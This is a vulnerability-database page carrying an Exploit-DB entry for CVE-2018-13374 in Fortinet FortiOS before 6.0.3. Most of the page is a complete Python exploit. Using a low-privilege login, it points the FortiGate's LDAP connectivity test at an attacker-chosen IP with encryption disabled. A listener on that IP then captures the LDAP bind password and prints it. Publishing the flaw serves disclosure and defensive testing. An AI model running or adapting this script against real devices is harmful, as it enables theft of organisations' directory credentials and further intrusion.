Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Fortinet FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure

🗓️ 16 Jan 2019 00:00:00Reported by Julio UreñaType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 103 Views

Fortinet FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure. Exploitation of Fortinet FortiGate FortiOS version 6.0.3 and below allows an attacker to disclose LDAP credentials

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2018-13374
22 Jan 201900:00
attackerkb
Circl		CVE-2018-13374
16 Jan 201900:00
circl
CISA KEV Catalog		Fortinet FortiOS and FortiADC Improper Access Control Vulnerability
8 Sep 202200:00
cisa_kev
Check Point Advisories		Fortinet FortiOS Improper Access Control (CVE-2018-13374)
20 Sep 202200:00
checkpoint_advisories
CVE		CVE-2018-13374
22 Jan 201914:00
cve
Cvelist		CVE-2018-13374
22 Jan 201914:00
cvelist
EUVD		EUVD-2018-5318
7 Oct 202500:30
euvd
exploitpack		FortiGate FortiOS 6.0.3 - LDAP Credential Disclosure
16 Jan 201900:00
exploitpack
Fortinet		Protect
1 Jun 202100:00
fortinet
Tenable Nessus		Fortinet Fortigate using the LDAP test connectivity feature (FG-IR-18-157)
28 Oct 202400:00
nessus
Rows per page
#/usr/bin/python3

"""
CVE-2018-13374
Publicado por Julio Ureña (PlainText)
Twitter: @JulioUrena
Blog Post: https://plaintext.do/My-1st-CVE-Capture-LDAP-Credentials-From-FortiGate-EN/
Referencia: https://fortiguard.com/psirt/FG-IR-18-157

Ejemplo: python3 CVE-2018-13374.py -f https://FortiGateIP -u usuario -p password -i MiIP 
Ejemplo con Proxy: python3 CVE-2018-13374.py -f https://FortiGateIP -u usuario -p password -i MiIP  --proxy http://127.0.0.1:8080
"""

from threading import Thread
from time import sleep
import json, requests, socket, sys, re, click

# Disable SSL Warning
requests.packages.urllib3.disable_warnings()

# To keep the Cookies after login.
s = requests.Session()
	
def AccessFortiGate(fortigate_url, username, password, proxy_addr):
	url_login = fortigate_url+'/logincheck'

	# Pass username and Password
	payload = {"ajax": 1, "username":username, "secretkey":password}

	# verify=False - to avoid SSL warnings
	r = s.post(url_login, data=payload, proxies=proxy_addr, verify=False)

	if s.cookies:
		return True
	else:
		return False
	

def TriggerVuln(fortigate_url, ip, proxy_addr):
	print("[+] Triggering Vulnerability")
	# Access LDAP Server TAB
	r = s.get(fortigate_url+'/p/user/ldap/json/',cookies=requests.utils.dict_from_cookiejar(s.cookies), proxies=proxy_addr, verify=False)

	# Load the response in a json object 
	json_data = json.loads(r.text)

	# Assign values based on FortiGate LDAP configuration
	name = json_data['source'][0]['name']
	username = json_data['source'][0]['username']
	port = int(json_data['source'][0]['port'])
	cnid = json_data['source'][0]['cnid']
	dn = json_data['source'][0]['dn']
	ca = json_data['source'][0]['ca-cert']
	
	thread = Thread(target = GetCreds, args = (ip, port))
	thread.start()
	sleep(1)
	
	print("[+] Username: ", username)
	
	# Create json object for the vulnerable request, changing the server and setting up secure to 0
	ldap_request = {"info_only":1,"mkey":name,"ldap":{"server":ip,"port":port,"cn_id":cnid,"username":username,"dn":dn,"secure":0,"ca":ca,"type":2}}

	# Trigger the vulnerability
	r = s.get(fortigate_url+'/api/ldap?json='+str(ldap_request), cookies=requests.utils.dict_from_cookiejar(s.cookies),proxies=proxy_addr, verify=False)
	r.close()

def GetCreds(server, port):
	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	
	# Allow to reuse the server/port in case of: OSError: [Errno 98] Address already in use
	sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

	server_address = (server, port)
	sock.bind(server_address)

	sock.listen()
	credentials = ''

	while True:
		print('[+] Waiting Fortigate connection ...')
		c, client_address = sock.accept()		
		try:
			while True:
				data = c.recv(1024)
				credentials = str(data)
				# \\x80\\ was common with 3 different passwords / user names, that's why it's been used as reference. 
				# It separe the username and the password
				ldap_pass = re.sub(r'.*\\x80\\','',credentials) #.replace("'","")
				print("[+] Password: ", ldap_pass[3:-1])
				break
		finally:
			c.shutdown(socket.SHUT_RDWR)
			c.close()
			sock.shutdown(socket.SHUT_RDWR)
			sock.close()

		if credentials:
			break

def print_help(self, param, value):
	if value is False:
		return
	click.echo(self.get_help())
	self.exit()

@click.command()
@click.option('-f', '--fortigate-url', 'fortigate_url', help='FortiGate URL.', required=True)
@click.option('-u', '--username', 'username', help='Username to login into Fortigate. It can be a read only user.', required=True)
@click.option('-p', '--password', 'password', help='Password to login into FortiGate.', required=True)
@click.option('-i', '--ip', 'ip', help='Host IP to send the credentails.', required=True)
@click.option('-pr', '--proxy', 'proxy', default=None, help='Proxy protocol and IP and Port.', required=False)
@click.option('-h', '--help', 'help', help='Help', is_flag=True, callback=print_help, expose_value=False, is_eager=False)
@click.pass_context


def main(self, fortigate_url, username, password, ip, proxy):
	if not fortigate_url and not username and not password:
		print_help(self, None,  value=True)
		print("[-] For usage reference use --help")
		exit(0)

	# Configure Proxy For Web Requests
	proxy_addr = {
	        'http': proxy,
	        'https': proxy
	}
	message = """[+] CVE-2018-13374
[+] Publicado por Julio Ureña (PlainText)
[+] Blog: https://plaintext.do
[+] Referencia: https://fortiguard.com/psirt/FG-IR-18-157
"""
	print(message)

	if AccessFortiGate(str(fortigate_url),username, password, proxy_addr):
		print("[+] Logged in.")
		sleep(1)
		TriggerVuln(str(fortigate_url), ip, proxy_addr)
	else:
		print("[-] Unable to login. Please check the credentials and Fortigate URL.")
		exit(0)

if __name__ == "__main__":
	main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Jan 2019 00:00Current
5.1Medium risk
Vulners AI Score5.1
CVSS 24
CVSS 3.14.3
EPSS0.03367
SSVC
fortinet fortigate fortiosldapcredential disclosure
103